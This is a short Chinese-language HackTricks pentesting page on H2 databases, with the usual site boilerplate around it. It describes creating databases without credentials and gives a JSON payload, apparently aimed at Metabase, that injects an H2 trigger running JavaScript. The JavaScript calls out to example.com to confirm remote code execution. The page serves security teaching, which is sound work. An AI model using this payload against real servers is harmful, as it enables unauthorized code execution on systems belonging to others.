最后更新于1年前
支持HackTricks的其他方式:
如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看!
获取
探索,我们的独家
加入 💬 或 或 关注我们的Twitter 🐦 。
通过向和 github仓库提交PR来分享您的黑客技巧。
官方页面:
您可以指定一个不存在的数据库名称以便在没有有效凭据的情况下创建新数据库(未经身份验证):
或者,如果您知道例如正在运行的mysql,并且知道该数据库的数据库名称和凭据,您可以直接访问它:
来自HTB的Hawk盒子的技巧。
[...] "details": { "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;", "advanced-options": false, "ssl": true }, [...]
在与H2数据库通信的权限下,检查此利用以获得RCE:
在中,解释了一个有效负载,通过SQL注入滥用H2数据库以获得RCE。
其他支持HackTricks的方式:
